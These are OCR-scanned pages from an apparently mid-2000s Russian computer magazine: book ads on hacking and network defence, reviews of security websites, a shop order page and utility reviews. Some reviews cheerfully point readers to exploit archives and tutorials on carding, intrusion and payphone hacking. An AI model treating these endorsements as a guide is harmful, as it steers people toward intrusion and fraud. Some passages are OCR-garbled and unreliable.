подключении к инету: опре- 
деления текущего уровня 
защищенности, необходи- 
мости в средствах защиты и 
усиления защиты посред- 
ством установки дополни- 
тельных программ. Как ус- 
тановить персональный 
брандмауэр, чтобы умень- 
шить свою уязвимость, как 
правильно установить и 
конфигурировать McAfee, 
BlackICE, Defender и 
ZoneAlarm, как протестиро- 
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вать защиту и закрыть сла- 
бые места в системе безо- 
пасности - в этой книге ты 
найдешь ответы на эти и 
другие вопросы. 


ЗАЩИТА ОТ ХАКЕРОВ. 
АНАЛИЗ 20 СЦЕНАРИЕВ 
ВЗЛОМА 


Шиформан М. 


Разумная цена: 165 рублей 


20 сценариев взлома - 

20 реальных историй 
из области компьютерной 
безопасности, изложенных 
ведущими экспертами, кон- 
сультантами и специалиста- 
ми. Причем это не простой 
пересказ событий - npegc- 
тавлена подноготная каж- 
goro случая: анализ инци- 
дента и возможные методы 
решения проблемы. Те, кто 
несет ответственность за 
безопасность сетей, найдут 
много интересного о реаль- 
ных вторжениях, изучат 
сценарии атак и стили ата- 
кующих. Книга состоит из 
двух частей: в первой при- 
водятся описание случая 
взлома и сведения для вос- 
создания полной картины 
инцидента, во второй - 
предлагаются возможные 
пути выхода из ситуации и 
даются ответы на постав- 
ленные вопросы. 


БЫСТРО И ЛЕГКО. 
ХАКИНГ И АНТИХАКИНГ: 
ЗАЩИТА И НАПАДЕНИЕ 


Взлом и защита на 

наглядных примерах: 
проникновение в систему, 
реализация цели вторже- 
ния, сокрытие следов, ха- 
кинг браузеров, почтовых 
клиентов, ICQ, веб-сайтов, 
атаки DoS, хакинг компью- 
теров Windows 2000/ХР, 
хакинг средств удаленного 
управления, хакинг бранд- 


Alex WebKnacKer 


Разумная цена: 175 рублей 


мауэров, перехват сетевых 
данных, хакинг коммутируе- 
мого доступа и многое дру- 
гое. Прилагается диск, на 
котором размещено более 
100 программ, описанных в 
книге. 


ЗАЩИТА 
КОМПЬЮТЕРНОЙ 
ИНФОРМАЦИИ 


Разумная цена: 115 рублей 


Современные техно- 

логии защиты инфор- 
мации, детально описанные 
в этой книге, - твое оружие 
против попыток несанкцио- 
нированного доступа к кон- 
фиденциальным данным. 
Прочитав книгу, ты нау- 
чишься находить и удалять 
так называемые програм- 
мные закладки (клавиатур- 
ные шпионы, троянские 
программы и т.п.), усилишь 
парольную защиту ОС для 
предотвращения взлома и 
защитишь свою систему от 
проникновения извне через 
компьютерную сеть. А, при- 
меняя описанные техноло- 


гии шифрования, сможешь 
сделать так, чтобы к храни- 
мым данным доступ имел 
только ты. 


ЗАЩИТА ОТ ХАКЕРОВ 
КОММЕРЧЕСКОГО САЙТА 


Рассел Р. 


Разумная цена: 578 рублей 


Казалось бы, програ- 

ммное обеспечение 
постоянно модернизируется 
и со временем должно стать 
неприступным для атак. На 
практике все с точностью 
go наоборот. Идея книги: 
защитить свой ресурс от 
взлома можно, если думать, 
как взломщик. Ты узнаешь 
способы взлома защиты 
(DDoS-ataku) и сможешь 
собственноручно проверить 
систему безопасности на 
прочность. Особое внима- 
ние уделено вопросу безо- 
пасности финансовых тран- 
закций через интернет и 
разработке изначально за- 
щищенного веб-сайта. Nog- 
робно рассмотрены методы 
оценки защитных мер и 
внедрение политики сете- 
вой безопасности, а также 
чрезвычайное планирова- 
ние на случай взлома. 


ТЕХНИКА СЕТЕВЫХ 
АТАК 


Доступное описание 

проблем безопаснос- 
ти в сети. Даны рекоменда- 
ции, как обезопасить себя 
от атак на UNIX (атака Ke- 
вина Митника), Windows 
95/98/МТ/2000 (уязви- 
мость автоматического вхо- 
да в систему, уязвимость 
алгоритма шифрования 
хэш-значения, передавае- 
мого по сети, подбор паро- 
ля, атака RedButton), систе- 
мы электронной торговли, 
почтовые серверы (перех- 


Касперски 


Разумная цена: 184 рубля 


ват почтового трафика, 
червь Морриса, ошибка 
"uudecode", ошибка неяв- 
ной поддержки конвейера) 
и клиентов, веб-серверы и 
браузеры, телеконферен- 


ции и многое другое. Бонус - 


черные ходы в Windows 
2000. 


ПРОТИВОСТОЯНИЕ 
ХАКЕРАМ. ПОШАГОВОЕ 
руководство 

ПО КОМПЬЮТЕРНЫМ 
АТАКАМ И 
ЭФФЕКТИВНОЙ ЗАЩИТЕ 


Скудис Э. 


Разумная цена: 190 рублей 


Книга адресована 
[>> системным и сетевым 
администраторам, занимаю- 
щимся компьютерными ата- 
ками и способами их предо- 
твращения. Стратегии атак 
и методы защиты, которые 
описаны в книге, использу- 
ются на практике многими 
предприятиями и организа- 
циями, имеющими компью- 
терные сети. Прочитав кни- 
гу, ты поймешь, какими ме- 
тодами пользуется твой 
противник при взломе: на- 


чиная от простого сканиро- 
вания и заканчивая мощны- 
ми атаками (которые зачас- 
тую носят заказной харак- 
тер и хорошо финансиру- 
ются). Детально рассматри- 
ваются наиболее часто 
встречающиеся стратегии 
реальных атак и даются со- 
веты, как защититься от 
возможных нападений. 


ОБНАРУЖЕНИЕ 
НАРУШЕНИЙ 
БЕЗОПАСНОСТИ В СЕТЯХ 


Разумная цена: 204 рубля 


Современные аппа- 

ратные и програм- 
мные средства противодей- 
ствия атакам хакеров, кото- 
рые позволят организовать 
надежную защиту своей 
локальной сети или отдель- 
ного ее узла. Удобно, что 
описывается полная после- 
довательность действий, 
которые должны осущес- 
твляться при возникнове- 
нии нестандартных ситуа- 
ций. Изучив книгу, ты нау- 
чишься понимать основные 
принципы работы протоко- 
лов ТСРЛР в реальных ус- 
ловиях, анализировать се- 
тевой трафик, разбираться 
в полях |Р-заголовка, ис- 
пользовать анализаторы 
TCPdump и Snort для выяв- 
ления вредоносного трафи- 
ка, обнаруживать разведку 
и сканирование с помощью 
специальных программ. 


ПОТОЧНЫЕ ШИФРЫ 


Рассматриваются ос- 

новы криптографии с 
секретным ключом, симмет- 
ричные шифры, блочные и 
поточные шифры, совре- 
менные синхронные поточ- 
ные шифры, стохастичес- 


Разумная цена: 127 рублей 


кие поточные криптоалго- 
ритмы (приводятся примеры 
вероятностных и полиморф- 
ных поточных шифров), за- 
щита информации в стан- 
дарте GSM, криптоанализ 
протокола WEP (использу- 
ется в беспроводных сетях 
RadioEthernet; в ядре этого 
протокола расположен по- 
точный криптоалгоритм 
RC4, с помощью которого 
шифруется весь трафик 
беспроводной сети). 


ПРОГРАММИРОВАНИЕ 
АЛГОРИТМОВ ЗАЩИТЫ 
ИНФОРМАЦИИ: УЧЕБНОЕ 
ПОСОБИЕ 


Домашев А.В. 


Разумная цена: 150 рублей 


Книга посвящена 

вопросам програм- 
мной реализации различ- 
ных методов защиты ин- 
формации (основное внима- 
ние уделено криптографи- 
ческим механизмам защи- 
ты). Рассматриваются реа- 
лизация отечественного 


стандарта криптографичес- 
кой защиты 28147-89: раз- 
личные аспекты реализа- 
ции и оптимизации алгорит- 
ма; сертифицированная 
система криптографической 
защиты "Bep6a-O"; алгорит- 
мы выработки и проверки 
электронной цифровой под- 
писи; основные методы реа- 
лизации датчиков случай- 
ных чисел; вопросы повы- 
шения надежности програ- 
ммных средств защиты ин- 
формации; интерфейс 
CryptoAPI 1.0. Книга неза- 
менима для тех, кто изучает 
дисциплины "Программно- 
аппаратные средства обес- 
печения информационной 
безопасности", "Методы 
криптографической защиты 


информации". St 
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Каролик Андрей (andrusha@s 


SECURITY.NNOV.RU 


в pesesa ча 


Этот проект был 

создан еще в 1999 
году благодаря стараниям 
ЗАРАЗы (ЗАРАЗА®5$есиг!- 
ty.nnov.ru) - профессио- 
нала в области безопас- 


ности корпоративных се- 
тей (если помнишь, ин- 
тервью с ним мы делали в 
апрельском Спеце). Сей- 
час это обновляемый нес- 
колько раз в неделю но- 
востной портал, посвя- 
щенный компьютерной 
безопасности. Новости 
собираются с различных 
сайтов и из рассылок, 
посвященных взлому и 
безопасности (для каж- 
дой новости указан ее ис- 
точник). Тут же ты най- 
дешь несколько авторс- 
ких материалов ЗАРАЗы и 
коллекцию эксплоитов (в 
хозяйстве пригодится :). 
Форум сайта порадовал 
обилием познавательных 
ниток, а не разговорами о 
погоде. 


WWW.SECURITYLAB.RU 


Портал, оперативно 
рассказывающий о 
событиях в области инфор- 
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ВКУСНЫЕ ССЫЛКИ В ИНТЕРНЕТ 


мационной безопасности. 
Здесь ты найдешь послед- 
нюю информацию о найден- 
ных уязвимостях и конкрет- 
ные рекомендации по их 
устранению. Есть и анали- 
тические материалы по раз- 
личным направлениям ин- 
формационной безопаснос- 
ти. Тут же последние бюл- 
летени безопасности произ- 
водителей различного ПО и 
подробная информация по 
эксплоитам: цель, воздей- 
ствие, автор, описание уяз- 
вимости, а также ссылка, 
чтобы скачать исходник, - 
естественно, для анализа, а 
не для использования по 
назначению :). На сайте 
собрано более 5000 (!) раз- 
личных утилит (с описани- 
ем), которые необходимы 
администраторам и разра- 
ботчикам программного 
обеспечения в повседнев- 
ной работе. Форум по праву 
считается одним из самых 
популярных в России. На 
нем, в основном, общаются 
системные администраторы, 
специалисты в области 
компьютеров, компьютер- 
ной безопасности и защиты 
информации, разработчики 
программного обеспечения. 
Задай правильный вопрос - 
и получишь оперативный 
ответ от специалистов. 


Популярный "мамонт" 

(существует уже дав- 
но) среди русскоязычных 
сайтов, посвященных ин- 
формационной безопаснос- 
ти. О полезности ресурса 
можно судить по ежене- 
дельному тиражу информа- 
ционных рассылок, который 
зашкаливает за 100 тысяч. 
Характерная черта сайта - 
его создатели не ставили 
целью гнаться за объемом и 
заниматься мониторингом 
информации о многочис- 
ленных уязвимостях мало- 
известных программ. Кроме 
того, некоторые тексты ав- 
торы намеренно оставляют 
на английском языке, счи- 
тая свою аудиторию доста- 
точно образованной и без 
проблем владеющей техни- 
ческим английским (на вся- 
кий пожарный есть элект- 
ронные переводчики). Упор 
делается на отслеживание 
тенденций, аналитику и ин- 
формирование о наиболее 
значимых событиях. В 2003 
году сайт победил в номи- 
нации "Сайт года" от 
"Хард'н'софт" (http://ezheru/ 
POTOP/results.html?do=res;2003;13), 
ав 2004 году занял 3-е 
место в номинации "Сайт 
информационных техноло- 
гий и телекоммуникаций" от 
"РОТОР" 


(http://ezhe.ru/POTOP/results.html? 
do=res;2004'11). 


WWW.VOID.RU 


Другой некоммерчес- 

кий проект, который 
позиционирует себя как не- 
зависимый сайт по вопро- 
сам информационной безо- 
пасности (уязвимости в 
программном обеспечении, 
технологии сбора информа- 
ции и технологии сохране- 
ния целостности систем). 
Здесь есть и новости, и 
статьи, но настоящей изю- 
минкой ресурса является 
файловый архив, детальная 
статистика по русскому сек- 
тору интернета и архив ин- 
цидентов. При желании ты 
можешь зарегистрировать- 
ся (http://void.ru/?do=reg) и на- 
чать принимать участие в 
жизни проекта - писать ком- 
ментарии к материалам, 
расположенным на ресурсе, 
присылать свои собствен- 
ные пресс-релизы, новости 
и любую другую информа- 
цию, которая имеет отноше- 
ние к безопасности данных. 
Для программистов и сете- 
вых администраторов есть 
раздел, посвященный рабо- 
те (вакансии и резюме). 


Ресурс, посвященный 
Unix-cucteMaM и отк- 


рытым технологиям, agpeco- 
ван прежде всего админист- 
раторам и программистам. 
Он мало чем отличается от 
подобных порталов, содер- 
жит стандартные разделы: 
новости, статьи, советы, 
форум, ссылки и документа- 
ция. Но есть внутри сайта 
несколько мини-порталов, 
имеющих узкую специали- 
зацию: solaris.opennet.ru 
(OC Sun Solaris), bsd.open- 
net.ru (OC FreeBSD, 
OpenBSD, NetBSD), 
cisco.opennet.ru (маршрути- 
заторы и коммутаторы), 
linux.opennet.ru (OC Linux), 
web.opennet.ru (веб-техно- 
логии), security.opennet.ru 
(безопасность), palm.open- 
net.ru (карманные ПК), 
ftp.opennet.ru (файловый 
архив). Нам в данном слу- 
чае интересен портал secu- 
rity.opennet.ru, который 
посвящен безопасности 
Unix-nogo6HbIx систем 
(Linux, Solaris, FreeBSD, 
OpenBSD, SCO, AIX uv T.g.). 
Для удобства ресурс четко 
разбит на тематические 
разделы: Summary advi- 
sories (практические сове- 
ты), Exploits (эксплоиты), 
CGI scripts bugs (дырки в 
скриптах Ha cgi), Patches 
(патчи), Network-level appli- 
cations (сетевые приложе- 
ния), User-level applications 
(несетевые приложения), 
Routers (Cisco) and firewalls 
(роутеры и фаерволы), 
Linux (RedHat, Mandrake, 
Debian), FreeBSD, NETBSD, 
OpenBSD, BSDI, AIX, True64, 
HP UNIX, SGI IRIX, SCO 
UNIX, Solaris, SUNOS, MS 
bugs (баги микромягкого). 
Такое деление очень удоб- 
но: меньше рыться в ссыл- 
ках и проще находить инте- 
ресующую информацию. 


WWW.NSD.RU/HACK.PHP 


Неплохая подборка 

статей, всевозможных 
руководств и обучающих 
мануалов по взлому. Статьи 
(более 120) крайне инфор- 
мативны. Тут тебе и сетевой 
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взлом для начинающих 
(сканеры, прокси, логи, ано- 
нимная почта, фаерволы, 
взлом хостинга, баги в ча- 
тах и форумах, эскплоиты и 
трояны), и сетевой взлом 
для продвинутых (алгорит- 
мы анализа удаленной сис- 
темы, ОМ№$-спуфоинг, обход 
фаерволов, секреты IP-npo- 
токола, взлом роутеров, пе- 
реполнение буфера, nog- 
делка МАС-адресов и про- 
чее), консольные команды, 
сетевая защита (веб-серве- 
ра, от $УМ-атак, техника 
сокрытия портов от сетевых 
сканеров), защита программ 
(защита байт-кода, безопас- 
ность Cgi скриптов), безо- 
пасность и тонкости Unix- 
систем и прочие вкусные 
статьи по взлому (взлом ав- 
тоответчиков, взлом таксо- 
фонов, перепрошивка SIM- 
карты). 


WWW.DCHACK.NET 


Сайт посвящен сете- 

вой безопасности и 
всему, что с этим связано. 
Он не претендует на мега- 
популярность, но интересен 
тем, что содержит в основ- 
ном актуальные материалы 
и неустаревшую информа- 
цию (ведь обычно подоб- 
ные ресурсы страдают уста- 
реванием контента). На сай- 
те ты найдешь: статьи (оп- 
ределение и сокрытие IP, 
кардинг, сетевые протоко- 
лы, DoS, трояны, 
DCOM/RPC, взлом паролей, 
изнасилование Линукса :), 
черви, шпионы, удаленное 
переполнение, работа с БД 
и прочее), файловый архив 
(эксплоиты, брутфорс, ска- 


неры, снифферы и T.g.), те- 
матические форумы (взлом, 
серфинг, программирова- 
ние, софт, железо, уязви- 
мости), эксплоиты и уязви- 
мости. 


Ресурс для програм- 

мистов на ассемблере 
под различные операцион- 
ные системы (большая 
часть материалов касается 
программирования под 
Windows). Основные нап- 
равления материалов сайта: 
системное программирова- 
ние, сетевое программиро- 
вание, отладка и дизассемб- 
лирование программ, защи- 
та от дизассемблирования и 
вопросы, касающиеся раз- 
личных аспектов безопас- 
ности. Также на сайте нахо- 
дятся исходники на ассемб- 
лере (интерфейс, работа с 
файлами, графика, мульти- 
медиа, сеть, система, утили- 
ты) и большое количество 
инструментов (редакторы, 
модификаторы, распаков- 
щики, компиляторы, упаков- 
щики, отладчики, примочки 
для 5оН-[се и IDA, крипто- 
ры, дизассемблеры, инстал- 
ляторы, декомпиляторы и 
многое другое), которые мо- 
гут пригодиться кодеру. 
Коллекция программ посте- 
пенно обновляется и попол- 
няется. И очень хорошо ор- 
ганизован и оформлен ‹ро- 
рум (http://www.wasm.ru/forum/). 


WWW.SECURITYFOCUS.COM 


Этот ресурс был куп- 
лен компанией 
Symantec в 2002 году и на 


данный момент является 
достаточно известным ин- 
формационным источником 
для профи по безопасности 
во всем мире. Доступ к точ- 
ной и оперативной инфор- 
мации осуществляется со- 
вершенно бесплатно (если 
для наших ресурсов бесп- 
латность очевидна, то на 
Западе полно аналогичных 
ресурсов с некоторой, пусть 
небольшой, абонентской 
платой). SecurityFocus при- 
держивается нейтральной 
позиции по отношению к 
взлому, обеспечивая посе- 
тителей объективной, сво- 
евременной и всесторонней 
информацией. База данных 
по известным уязвимостям 
различных платформ и ус- 
луг интересна профи благо- 
даря самой свежей инфор- 
мации, которая выкладыва- 
ется на сайт бесплатно че- 
рез 48 часов после того, 
когда уязвимость была най- 
дена. Более оперативно 
(почти сразу) эту информа- 
цию получают платные 
пользователи Symantec. 
Статьи для сайта пишут лю- 
ди не с улицы, а из специ- 
ального штата. Все матери- 
алы для удобства поиска 
условно разделены на во- 
семь групп: Penetration- 
Testing (тест на защищен- 
ность), Firewalls (брандмау- 
эры), Intrusion Detection 
(IDS, обнаружение атак), 
Incident Handling (обработка 
инцидента) и другие. 


WWW.CERT.ORG 


Этот сайт (по сути, Ha- 

учно-исследовательс- 
кий институт) был открыт в 
1988 году после громкого 
инцидента с червем, кото- 
рый поразил около 10% 
компьютеров, подключен- 
ных к инету. Ha CERT/CC ты 
найдешь множество сове- 
тов по совершенно разным 
компьютерным инцидентам, 
связанных с безопас- 
ностью. На сайте анализи- 
руются уязвимости в прог- 
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раммном обеспечении, ce- 
тях и системах, используе- 
мые на межсетевых компь- 
ютерах. Анализу подверга- 
ются прежде всего тенден- 
ции в инцидентах и методы 
вторжения. Информация 
окажется полезной в пер- 
вую очередь администрато- 
рам сетей. 


WWW.SECURITYNEWS- 
PORTAL.COM 


SecurityNewsPortal - 

некоммерческий pe- 
cypc, на котором собраны 
последние новости по виру- 
сам, троянам, хакерам и 
прочей нечисти. Фактичес- 
ки SNP делает один чело- 
век, работающий на пиве :) 
и собирающий новости по 
безопасности. Обновление 
сайта происходит 24 часа в 
сутки, семь дней в неделю и 
365 дней в году. Многие, 
кто знаком с этим сайтом, 
любят его за авторское 
мнение. Марк, автор ресур- 
са, поясняет это так: "Каж- 
дый день я просматриваю 
несколько сотен статей и 
новостей. Некоторые статьи 
производят на меня впечат- 
ление, некоторые заставля- 
ют зевнуть, некоторые де- 
лают меня разъяренным, а 
некоторые заставляют сме- 
яться. Я отбираю те новос- 
ти, которые считаю стоящи- 
ми, и комментирую их". То 
есть на этом сайте ты не 
найдешь всех новостей по 
безопасности, но только са- 
мое вкусное и достаточное 
для того, чтобы иметь 
представление о происхо- 
дящем в интернете. 


DJILAND.NAROD.RU/OBR. 
HTML 


Мал золотник, ga go- 

por - так можно оха- 
рактеризовать этот ресурс. 
Здесь выложено всего нес- 
колько заархивированных 
книжек, но каких! Мануал 
по хаку, учебник по 
Visual++, учебник по 
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Borland С++, учебник по 
C++ от автора языка Бьерна 
Страуструпа, библия прог- 
раммиста Кнута (правда, по- 
чему-то только первый и 
третий тома) и пособие по 
программированию под 
Windows в двух частях. Вы- 
качивай и читай на 390- 
ровье! 


DOCS.GETS.RU 


Компьютерная биб- 
[>> лиотека, в которой 
собраны тысячи (!) статей 
на совершенно разные те- 
мы. По безопасности, к 
примеру, здесь лежит 190 
статей. Библиотека разби- 
та на тематические разде- 
лы (базы данных, безопас- 
ность, графика и дизайн, 
игры, интернет-маркетинг, 
интернет-технологии, 
компьютеры и железо, мо- 
бильные устройства, опе- 
рационные системы, прог- 
раммирование, програм- 
мные руководства, сети и 
разное), которые, в свою 
очередь, имеют подразде- 
лы (раздел безопасность, 
например, содержит под- 
разделы: вирусы, интер- 
нет, криптография, опера- 
ционные системы, програм- 
мы и разное). Интересно, 
что библиотека хранит не 
оригинальные тексты, а 
ссылки на первоисточники. 
При этом я не нашел, 
сколько ни ковырялся, ни 
одной битой ссылки. При- 
ятно, однако. 


WWW.CODENET.RU 
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[>> Настоящий рай для 
программистов. Чего 
тут только нет: С и С++, C++ 
Builder, Visual C++, Visual 
Basic, Delphi, accem6nep, 
DOS & BIOS, оптимизация, 
алгоритмы, компиляторы, 
MySql, Postgres, Interbase, 
Oracle, MS SQL Server, 
Visual FoxPro, СУБД Cache, 
САЗЕ-средства, PHP, Perl, 
Java, RFC2068, XML, 
Cookies, CGI, SSI и еще куча 
всего. Единственное непо- 
нятно: почему автор сайта 
отнес Photoshop к необхо- 
димым ресурсам програм- 
миста. Здесь же есть огром- 
ное количество исходников 
и тематические форумы: 
Borland C++ Builder, 
Microsoft Visual C++, Delphi 
& Kylix, Pascal, работа с rpa- 
фикой, работа со звуком, 
Visual Basic, низкоуровне- 
вое программирование, опе- 
рационные системы, безо- 
пасность и шифрование, 
SQL- и $ОЁ-сервера, веб- 
программирование, верстка 
HTML и глюки NN u MSIE. 


WWW.SOURCES.RU 
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На этом ресурсе 

собраны одновре- 
менно и справочные мате- 
риалы, и статьи, и исход- 
ники по Java, Java 
Scripts, Delphi, Pascal, 
Kylix, C/C++/Visual C++, 
C++ Builder, Visual Basic, 
ASM. Есть описание про- 


токолов НТТР, ЕТР, ВРС, 
SMTP, POP3, IMAP4, SNMP, 
IPX/SPX; каталог сайтов по 
ассемблеру, C++ Builder, 
C/C++ и Delphi. Форум 
(http://forum.sources.ru/) - один 
из наиболее крупных в 
рунете по программиро- 
ванию, безопасности и 
сетям. 


ALEXEENKO.PRIMA.SUSU. 
AC.RU 


Свое название - "e- 

Crypt: Kpuntorpacpua, 
шифрование" - ресурс no- 
лучил, потому что содержит 
достаточно большой объем 
информации по криптогра- 
фии и шифрованию. Здесь 
ты найдешь документацию, 
книги и статьи по криптог- 
рафии, криптоанализу, 
шифрованию, сжатию, бе- 
зопасности и защите, ис- 
ходники наиболее криптос- 
тойких алгоритмов шифро- 
вания (RSA, IDEA, ГОСТ, 
Blowfish и другие) на язы- 
ках С/С++ и программы для 
защиты информации. 


BOARD.WIN32ASMCOM- 
MUNITY.NET 


Ассемблер - твой 
[>> стиль жизни? Тогда 
запомни эту ссылку, она не 
раз тебе пригодится. Ресурс, 
к сожалению, на английском, 
но ведь грех не знать меж- 
дународный язык :). Тем бо- 
лее программисту: как же 
мануалы тогда читаешь? 
Это не просто форум, а це- 
лое комьюнити (сообщество 
единомышленников), чле- 


нами которого являются 
люди со всего мира. На фо- 
руме они делятся опытом и 
идеями. Форум для удоб- 
ства поделен на несколько 
разделов: общие вопросы 
по win32asm, FAQ, MASM 
(посмотри еще 

), FASM (посмотри 
еще ), НЕА 
(High Level Assembly), anro- 
ритмы и исходные коды, ис- 
пользование и разработка 
IDE, работа с СОМ, работа с 
сетью, программирование 
игр и объектно-ориентиро- 
ванное программирование. 


—— НИ 


- некоммерческий 
проект, на котором ответы 
на многие вопросы найдет 
как начинающий пользова- 
тель, так и опытный специ- 
алист. Файлы ГАО распре- 
делены по соответствую- 
щим тематическим катего- 
риям. Захотел ты, к приме- 
ру, программирование - ле- 
зешь на 
Каждый ГАО (по-русски 
ЧАВО - ЧАсто Задаваемые 
ВОпросы) - это небольшой 
файл со списком вопросов 
по определенной тематике 
и ответами на них (с ком- 
ментариями и примерами). 
Если не нашел ответа на 
свой вопрос, смело зада- 
вай его в форуме 
( ) - воз- 
можно, на него ответят его 
участники или модераторы. 
Большинство материалов 
присылается такими же эн- 
тузиастами, как и ты, либо 
взяты из Фидонет. 


B Russian FAQ Archives 


RTFM.VN.UA 


Здесь валяется раз- 

нообразная докумен- 
тация, связанная с компью- 
терами и информационными 
технологиями. Ресурс, ко- 
нечно, не претендует на на- 
личие любой документации, 


но все равно тут есть из че- 
го выбрать. Часть докумен- 
тации на русском, часть - на 
английском. Помимо доку- 
ментации с сайта открыт 
доступ к файловому архиву 
провайдера VinNest (г. Вин- 
ница), который постоянно 
обновляется. 


WWW.MICROSOFT.COM 


Если ты пользуешься 
чем-то, к чему прило- 
жили свои усилия ребята из 
Microsoft, то настоятельно 
рекомендую почаще захо- 
дить на этот сайт, чтобы не 
прозевать очередной патч 
от очередной дырки. Кроме 
того, на сайте лежит куча 
полезной информации по 
продуктам от Microsoft: 
ссылки на часто задавае- 
мые вопросы, инструкции 
и рекомендации, полезные 
советы, доступные обнов- 
ления и утилиты, ресурсы, 
расположенные на других 
серверах. Здесь же бесп- 
латные сервиспаки, об- 
новления, драйвера, раз- 
личные версии ПО от мел- 
комягкого и другие бесп- 
латные программки, кото- 
рые могут пригодится - 
все это хозяйство называ- 
ется Download Center 
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(Blizzard) StarCraft: Tassadar 
Figure 


Warcraft Ш Action Figure: 
Muradin Bronzebeard 
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WarCraft III Firebat 
Action Figure: 
Ticondrius 


Римини 0 


Unreal 
Tournament 2004 


Lineage Il: The 
Chaotic Chronicle 


Diablo Ни Diablo I! 
Expansion Set: Lord 
of Destruction (urpa + 

дополнение) 


о | 
Grand Theft Auto: The Sims 2 


Vice City 


Baldur's Gate 
Original Saga 


Counter-Strike: 


Driver 3 i + Fli 
Chere qin We Condition Zero 


Your Life! 


Заказы по интернету — круглосуточно! 
Заказы по телефону можно сделать 


(095) 928-6089 (095) 928-0360 (095) 928-3574 
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ИНДЕКС ГОРОД 
УЛИЦА ДОМ КОРПУС. КВАРТИРА 


ФИО 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, E-SHOP 
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ОТ МОМАМЕ ” . 


ВСЕ САМОЕ ВКУСНОЕ 


от и пришла пора получать новую посылку от nnm.ru! Программки, которые ты, кстати, найдешь на диске, 
позволят тебе растопырить пальцы перед приятелями (если они, конечно, не читают ХС ;). 


Х-ЗЕТОР PRO 6.6.300 FINAL 


Вышел финальный релиз лучшего твикера систе- 
[>> мы - X-Setup Pro 6.6.300 Final (4,54 Мб). При помо- 
щи этой программы в твоих силах стало настроить все, что 
только теоретически возможно настроить в самой 
Windows и ее "окрестностях". В программе можно изме- 
нить более 1600(!) всевозможных "галочек". Настраиваем 
Windows, DirectX, Windows Media Player, Outlook Express и 
прочий сост от мелкомягких, a также Opera, Netscape, 
Real Player, Mozilla, NeoPlanet, Eudora... Не хватает только 
встроенного "TweakTC" для настройки Total Commander. 


Это еще не все: благодаря тому, что можно подключать 
дополнительные плагины, возможности программы можно 
расширять. В частности, есть плагин для "тонкой" наст- 
ройки блинонарезательной программы Мего. По адресу 
http://www.x-setup.net/downloads/plugins.asp ты найдешь 
более 20 плагинов. Каждый настраиваемый параметр 
снабжен описанием, в случае необходимости - ссылками 
на страницы интернета. Программа работает почти со все- 
ми версиями Windows (95/98/98SE/ME/NT 
4.0/2000/ХР/2003). Так что дружно качаем и очень акку- 
ратно настраиваем систему, дабы не наломать дров, по- 
наставив "галок" не там, где надо... Начни работу с нажа- 
тия кнопки "Uninstall Tweak-XP" :). 
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НОТ KEYBOARD PRO V2.3 


Одна из самых часто используемых утилит на моем 

компе. Программа позволяет осуществлять множе- 
ство монотонных операций с помощью всего пары кнопок 
(а кое-что вообще выполняет автоматом :)). Назначаем го- 
рячие клавиши практически для любой операции: запуска 
программ, открытия папок, вывода настраиваемого меню, 
запуска браузера (или конкретной странички), записи тво- 
их действий (клава, мышь, вставка пауз), вставки и/или 
автозамены текста, соединения/разъединения с интерне- 
том, манипуляций с окнами (закрыть, свернуть, развер- 
нуть, активировать, свернуть все, развернуть все и T.G.). 


Управление задачами при нахождении процессов (есть 
практически во всех действиях), напоминалка, управление 
WinAmp'om, громкостью, CD-nneepom, будильник, выклю- 
чение, перезагрузка, Log-Off компа и многое другое! Ты 
можешь самостоятельно задавать макросы, а можешь 
воспользоваться мастером, который проведет тебя по 
всем наиболее частым действиям! Встроенный шедулер - 
лепота! Любое действие сажаем на шедулер и получаем 
комп-автомат! Хочешь навсегда забыть о бэкапе - созда- 
вай новый макрос: "Запуск программы" [путь go WinRAR] - 
г! [куда бэкапим] [что бэкапим]. Пример: C:\Program 
Files\WinRAR\WinRAR.exe A -r i:\\backup\nnm.RAR 
e:\\NoNaMe\. Далее вешаем эту задачу во встроенный 
шедулер (выполнять каждый день в 5 утра) и все :). 


Планировщик можно установить на любой запрограмми- 
рованный макрос! Еще пример: выставляем в биосе ежед- 
невное включение компа на 2 ночи. Пока ты спишь, в 2:10 
Hot Keyboard сам дозвонится до инета. Затем самостоя- 
тельно снимет и отправит почту, запустит ReGet или ка- 
чалку сайтов, аську. А ближе к утру откроет все тот же 
NetCaptor с любимой CaptorGroup (группа сайтов), кото- 
рый ты не спеша (за чашечкой кофе, сигарой и любимой 
муз[ык]ой ;)) прочитаешь. В 9:00 ты уйдешь на работу, а 
Hot Keyboard выйдет в оффлайн, закроет все окна и вы- 
рубит компьютер. Вот такой кайф! 


в: В использовании прог- 
раммка проста как три 
копейки, макросы разг- 
руппированы, есть рус- 
ский фейс. Эта прога c3- 
кономит тебе драгоцен- 
ное время (секунду за 
секундой) и деньги. Спа- 
сибо разработчикам за 
столь качественный и 
нужный софт. 


SYSTEM SECURITY SUITE V1.04 


Быстрый способ очистки системы от мусора. Утилита 
[>> предлагает удалить Cookies, очистить кэш Internet 
Explorer, удалить index.dat файлы, хистори введенных 
URL'oB, временные файлы, корзину и прочее барахло. 


Можно самому выбрать маску файлов (*.$$$, *.tmp, *.old и 
прочее) для удаления. Также System Security Suite позво- 
ляет просмотреть, что загружается вместе с системой. 
Утилита имеет малый размер и бесплатна. 


Sh J 


покет ыы | User акне Роб | dhofhun Tact | ВНО | вещ | 


bonne Lepios My Comer 

fat длатколеновыию Риты № Cipbosnd! 

St дааа opiates] видение Placard Besragmeens derail 
ВЯ Софи о Fareed Files fLirdia| 
Pet На 7 Plecpeiie Br 

fe Tempera баз | 


ia Три decks (LIAL af i? Зажен Нойаву 
5 Терри Files R 
Е т 


WINSUPERKIT V5.1 (BUILD 555) 


Маленькая программка с огромными возможностя- 
BY ми. Включает в себя массу полезных сетевых ути- 
лит. Поиск |Р-адресов: сканирование сети и вывод всех 
1Ришников, поиск IP по задаваемому диапазону, показ 
МАС-адресов, пинг и установление географического место- 
расположения, групповой пинг, whois, trace. Полная ин- 
формация о твоей сетевой карте. Возможность добавле- 
ния, редактирования, удаления шар. По мелочи: ведение 
логов, монитор скорости, таймер работы компа и инета. Пе- 
рехват пакетов с выбранной сетевухи (жалко, без дфильт- 
ров). Просмотр и сравнение срайлов и директорий и прочее. 
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_ PIXGRABBER NONAME SPECIAL ___ RMOSCHANGE V1.0 
EDITION V1.0.05 eras es ee Sy et 


Многосрункциональная прога для сформирования ap- 

хива картинок и удобной работы с ними. Кроме этого, 
PixGrabber оградит тебя от надоедливой рекламы и позволит 
избавиться от повторного просмотра одних и тех же страниц. 


